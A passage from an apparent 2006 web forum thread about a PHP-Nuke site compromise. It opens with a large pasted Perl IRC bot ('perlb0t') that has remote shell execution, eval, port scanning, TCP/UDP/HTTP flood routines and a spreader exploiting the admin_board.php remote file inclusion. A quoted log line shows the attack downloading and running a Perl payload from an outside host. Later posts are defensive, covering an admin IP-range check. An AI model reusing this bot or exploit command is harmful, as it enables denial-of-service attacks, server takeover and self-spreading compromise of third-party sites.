ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^xxx\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[PHP-NUKE]\002 Scanning for unpatched admin_board.php for ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/modules/Forums/admin/admin_board.php?phpbb_root_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[PHP-NUKE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}

sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom (@dominios)
{
push (@str,"%22Page+Generation%3A%22+%7C+%22php-nuke%22+inurl%3Amodules.php%3Fname%3D+site%3A".$dom."%20");
}

my $query="www.google.ro/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;

}

All started via a get command to one of my Admin PHP functions, as in this example of many different Admin PHP functions:


66.41.68.96 - - [16/Jun/2006:23:42:37 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.exchangechannel.com/welcome/family/php/images/.xpl/cmd.txt?&cmd=cd%20/tmp;GET%20http://www.exchangechannel.com/welcome/family/php/images/.xpl/flux%20>%20flux;perl%20flux;rm%20flux*? HTTP/1.1

There are no signs this is going on in the background ("Because I am only being used as a bridge, and host none of their utilities") and required no PHP changes for this group to use my site as a bridge, no admin privileges, nada! ("Nothing")

Last Count there were over 50 sites hosting interfaces to this group ("I know this because my site is/was being used as a bridge for this group"), so I think the latest defacement was and is more than what it may have seemed to be to most web sites attacked, thinking that it was limited to defacement only.

Early on, I even found perl code inside an Avatar that could have been used, while I was making my changes another Admin was added, but I deleted this new admin ID, and the Avatar, and turned the ability to upload Avatar's off on this subdomain.

Hope this helps explain some of the current methods being used.

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Thug21

Premium Member

Hello ZOverload:

I tried "// IP check for Admin fuctions in admin.php ZOverLord
$ip = preg_split("/./", $REMOTE_ADDR);
if (($ip[0] 71)) {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}
// END of IP check for Admin fuctions in admin.php"

in my admin.php and it seems to block any IP that starts with 68 to 71. I need it to allow only IP's in the 68-71 range. Please let me know what I can do to achieve that.

Thanks!

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

Cudni

MVM

try reversing
// IP check for Admin fuctions in admin.php ZOverLord
$ip = preg_split("/./", $REMOTE_ADDR);
if (($ip[0] > 68) OR ($ip[0] < 71)) {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}
// END of IP check for Admin fuctions in admin.php

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

2 edits

ZOverLord

Premium Member

Thanks Cudni.

I will try to test it, not sure that would work.

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

Cudni

MVM

it is good you're testing it because i just reversed, without much thinking, what you posted earlier

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

2 edits

ZOverLord

Premium Member

Mybad. Here is a fix, it works with explode in place of preg_split


// IP check for Admin fuctions in admin??.php ZOverLord
$ip = explode(".", $REMOTE_ADDR);
if (($ip[0] < 68) OR ($ip[0] > 71)) {
echo "You are ???????? and are ??????? STUPID as Well!";
return true;
}
// END of IP check for Admin fuctions in admin.php

Please post if this worked, I tested it, and it worked as planned, it seems that preg_split included in the first example was not populating the IP variable properly.

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Thug21 to ZOverLord

Premium Member

to ZOverLord
Still seems to lock me out, regardless of the IP I put in the code. I noticed you are using php-nuke, I am using postnuke. Does that make any difference ?

Thanks!

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

ZOverLord

Premium Member

said by Thug21:

Still seems to lock me out, regardless of the IP I put in the code. I noticed you are using php-nuke, I am using postnuke. Does that make any difference ?

Thanks!
Should not make a difference, put this line in for testing to see what your IP really is:


// IP check for Admin fuctions in admin??.php ZOverLord
// This first line is for testing only!
echo "Your IP Address is $REMOTE_ADDR";
// Remove the line above after testing
$ip = explode(".", $REMOTE_ADDR);
if (($ip[0] < 68) OR ($ip[0] > 71)) {
echo "You are ???????? and are ??????? STUPID as Well!";
return true;
}
// END of IP check for Admin fuctions in admin.php

So....the question is, is your IP address really between 68.x.x.x and 71.x.x.x ?
ZOverLord

2 edits

ZOverLord

Premium Member

I have decided to publish this PHP protection code. Here is a zip file containing the files, any questions, just ask.

»testing.OnlyTheRightAnsw ··· tion.zip

If you would like to see it in action, you are more than welcome to use this WARNING the two example links below can cause MANY pop-up windows when using IE ("Even with pop-up blockers installed and running") so if you are bold enough to test this using IE be sure you have your task manager open to kill IEXPLORER tasks.

Also, the current language maybe offensive to some, just a heads up:

http://testing.OnlyTheRightAnswers.com/admin.php


You can also see that I can still find your REAL IP address when you are using IE even if you are behind Proxies by doing this:

http://anonymouse.org/cgi-bin/anon-www.cgi/http://testing.onlytherightanswers.com/admin.php

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

Cudni

MVM

but if scripting is disabled in IE it only displays an advert from the anon proxy and your rude advert

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

3 edits

ZOverLord

Premium Member

said by Cudni:

but if scripting is disabled in IE it only displays an advert from the anon proxy and your rude advert

Cudni
Yes, at the moment this is true, however I am working on a Generic version that will support all browsers, with or without scripting enabled.

Since this problem is currently MUCH more worse than the general public knows about, and since this does offer you total protection from all browsers even in its current form ("When the STUB is installed in the PHP programs you wish to protect") I felt it was best to release a working version now.

That version will not require any NEW STUB code and will simply be a change to one module "intruder.php" so it will be an easy upgrade as well, when the new release is complete.

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Thug21

Premium Member

I am sure my IP is in the 68-71 range. I'll try this again later and let you know how it goes